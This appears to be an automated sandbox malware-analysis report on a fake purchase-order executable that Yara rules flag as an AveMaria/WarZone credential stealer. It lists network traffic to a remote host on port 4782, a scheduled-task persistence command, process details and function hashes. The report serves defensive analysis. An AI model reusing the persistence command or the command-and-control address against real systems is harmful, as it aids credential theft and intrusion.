Nov 3, 2021 13:24:31.389187098 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.389250994 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.941473007 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964137077 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964174986 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964194059 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964215994 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964238882 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964257002 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964266062 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964291096 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964313984 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964334965 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964334965 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964350939 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964359999 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964375019 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964399099 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964401960 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964420080 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964422941 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964442015 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964452028 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964466095 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964487076 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964510918 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964513063 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964533091 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964555025 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964559078 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964577913 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964598894 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964605093 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964622021 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964623928 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964643955 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964663982 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964668989 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964685917 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964706898 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964709044 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964728117 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964751959 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964771986 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964781046 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964793921 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964796066 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964816093 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964835882 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964844942 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964879036 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964900970 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964909077 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964921951 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964942932 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964948893 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.964965105 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964988947 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.964997053 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.965013981 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.965038061 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.965040922 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.965063095 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.965086937 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.965110064 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.965114117 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.965133905 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.965159893 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.965162039 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.965184927 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.965188026 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.965209961 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.965234041 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.965256929 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:31.965266943 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:31.965290070 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.131627083 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.154185057 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154226065 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154249907 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154273033 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154299974 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154314041 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.154325008 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154342890 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.154350042 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154367924 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.154372931 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154397964 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154417992 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.154421091 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154445887 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154467106 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154489040 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154491901 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.154511929 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154537916 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154537916 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.154555082 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.154561996 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154587030 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154611111 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154613018 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.154633999 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154658079 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154660940 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.154683113 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154702902 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.154706001 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:32.154761076 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:32.273905993 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:34.228900909 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:34.308298111 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:50.387820959 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:24:50.388546944 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:24:50.464567900 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:25:10.403495073 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:25:10.404092073 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:25:10.480329037 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:25:30.418483973 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:25:30.419991970 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:25:30.511334896 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:25:50.436886072 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:25:50.437781096 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:25:50.511388063 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:26:10.491939068 CET	4782	49741	185.222.57.253	192.168.2.3
Nov 3, 2021 13:26:10.493067026 CET	49741	4782	192.168.2.3	185.222.57.253
Nov 3, 2021 13:26:10.574040890 CET	4782	49741	185.222.57.253	192.168.2.3

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ADJUSTED PO3917NOV.exe PID: 5404 Parent PID: 3608

General

Start time:	13:24:11
Start date:	03/11/2021
Path:	C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe"
Imagebase:	0x990000
File size:	963072 bytes
MD5 hash:	EC46F95F234B89325E198104D1887B1C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.327281323.00000000030A2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.327014581.0000000002ED1000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.327512166.0000000003ED9000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 3244 Parent PID: 5404

General

Start time:	13:24:22
Start date:	03/11/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QUQovKcaZRcNZ" /XML "C:\Users\user\AppData\Local\Temp\tmpD7D5.tmp
Imagebase:	0x12f0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4412 Parent PID: 3244

General

Start time:	13:24:22
Start date:	03/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: ADJUSTED PO3917NOV.exe PID: 1328 Parent PID: 5404

General

Start time:	13:24:22
Start date:	03/11/2021
Path:	C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\ADJUSTED PO3917NOV.exe
Imagebase:	0xf70000
File size:	963072 bytes
MD5 hash:	EC46F95F234B89325E198104D1887B1C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.327703338.00000000015C4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.327703338.00000000015C4000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000004.00000000.319379461.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000004.00000000.321459100.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000004.00000000.317402875.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.327531363.00000000015CA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.327531363.00000000015CA000.00000004.00000001.sdmp, Author: Joe Security Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000004.00000000.316730524.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.327615222.000000000159F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.327615222.000000000159F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.327638100.00000000015C4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.327638100.00000000015C4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.327579370.00000000015B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.327579370.00000000015B1000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000000.319990653.000000000054F000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000000.319990653.000000000054F000.00000040.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000000.321513614.000000000054F000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000000.321513614.000000000054F000.00000040.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000003.327551592.000000000159F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000003.327551592.000000000159F000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000002.554723844.000000000054F000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000002.554723844.000000000054F000.00000040.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000000.318229472.000000000054F000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000000.318229472.000000000054F000.00000040.00000001.sdmp, Author: Joe Security Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000004.00000000.319952873.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000004.00000000.318207568.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.327676957.00000000015CA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.327676957.00000000015CA000.00000004.00000001.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000004.00000000.319416601.000000000054F000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000004.00000000.319416601.000000000054F000.00000040.00000001.sdmp, Author: Joe Security Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: AveMaria_WarZone, Description: unknown, Source: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.327479352.00000000015A5000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000004.00000003.327479352.00000000015A5000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ADJUSTED PO3917NOV.exe PID: 5404 Parent PID: 3608 ADJUSTED PO3917NOV.exeCOMMON

Executed Functions

Function 0121C3E8, Relevance: 6.1, APIs: 4, Instructions: 127threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0121C450
GetCurrentThread.KERNEL32 ref: 0121C48D
GetCurrentProcess.KERNEL32 ref: 0121C4CA
GetCurrentThreadId.KERNEL32 ref: 0121C523

Memory Dump Source

Source File: 00000000.00000002.326514389.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: cd3e8ca51a2880d0f2ac740e0f2ca5b3b1f2df5ae943411089639609075c60e0
Instruction ID: 367afa9252d1ee17761deb27fd5c13d37e77a8bbc80111b6df2cb6fd7ab3388c
Opcode Fuzzy Hash: cd3e8ca51a2880d0f2ac740e0f2ca5b3b1f2df5ae943411089639609075c60e0
Instruction Fuzzy Hash: 9D5156B49406498FEB14CFAADA487EEBBF1EF48304F24896AE419A3350C7349844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0121C3F0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 0121C450
GetCurrentThread.KERNEL32 ref: 0121C48D
GetCurrentProcess.KERNEL32 ref: 0121C4CA
GetCurrentThreadId.KERNEL32 ref: 0121C523

Memory Dump Source

Source File: 00000000.00000002.326514389.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 650346535f116be113e38857f9bc7ed0776087017b72cd967e51c6eda63ddb1c
Instruction ID: c313d0dea0c5c3b8645598eb20962fcbb316e472805613a464fda5c1e88e4b5d
Opcode Fuzzy Hash: 650346535f116be113e38857f9bc7ed0776087017b72cd967e51c6eda63ddb1c
Instruction Fuzzy Hash: B25157B49406098FEB14CFAAD6487DEBBF1FF48304F24896AE019A7350C7349844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0121A0F0, Relevance: 1.7, APIs: 1, Instructions: 197COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0121A336

Memory Dump Source

Source File: 00000000.00000002.326514389.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f48b0550bb0f48951692f8cd864ecf630ad3a3895280069bbb897cdf36df96ce
Instruction ID: 3589701a9de09f363ef3f99a9591aae435a5d4064951b2ca031c59865ff9fdd9
Opcode Fuzzy Hash: f48b0550bb0f48951692f8cd864ecf630ad3a3895280069bbb897cdf36df96ce
Instruction Fuzzy Hash: 2C716370A11B468FDB24CF6AD4507AABBF5FF88304F008A29D58ADBA54D734E845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02E90AAC, Relevance: 1.6, APIs: 1, Instructions: 120COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02E90BCA

Memory Dump Source

Source File: 00000000.00000002.326956265.0000000002E90000.00000040.00000001.sdmp, Offset: 02E90000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 933cf83a063f1a1e563903ef6e3bfa0a60847fe5a733e8ad56d59a5f8b4f2068
Instruction ID: b3587178aa2c01bae73690db9b25030f75823626cb93de6c0c1721fa388eaf36
Opcode Fuzzy Hash: 933cf83a063f1a1e563903ef6e3bfa0a60847fe5a733e8ad56d59a5f8b4f2068
Instruction Fuzzy Hash: FE51D1B1D10308DFDF14CF99C894ADEBBB5BF88314F64962AE819AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02E90AB8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02E90BCA

Memory Dump Source

Source File: 00000000.00000002.326956265.0000000002E90000.00000040.00000001.sdmp, Offset: 02E90000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ab53122a18e86028b52c7184654a014c97de08b40314735a24139efacf1ff9bc
Instruction ID: f73dd41c2bf64aa95dfa1773b0ee2eb7668233d53e9b08a3b79d8ac4e5ee8250
Opcode Fuzzy Hash: ab53122a18e86028b52c7184654a014c97de08b40314735a24139efacf1ff9bc
Instruction Fuzzy Hash: 8541D2B1D00319DFDF14CF99C894ADEBBB5BF88314F64862AE419AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01215344, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01215401

Memory Dump Source

Source File: 00000000.00000002.326514389.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 998a38928e4f5275ee72aae91fc5a985aa1ad328f22b7ec5aac11609d535a154
Instruction ID: f4c2ee10bf9a304ae7c56f9bbbd4037cb6a4fd5f7903ff49f5fb2df53dd1856c
Opcode Fuzzy Hash: 998a38928e4f5275ee72aae91fc5a985aa1ad328f22b7ec5aac11609d535a154
Instruction Fuzzy Hash: E2412370D10219CFDB24CFA9C944BCEBBF5BF99304F20846AD108AB254DBB45946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01213E18, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 01215401

Memory Dump Source

Source File: 00000000.00000002.326514389.0000000001210000.00000040.00000001.sdmp, Offset: 01210000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d78cc4295d52db4797c881869a1189b922bd79d2764b87299d2aea29d8ed4cf0
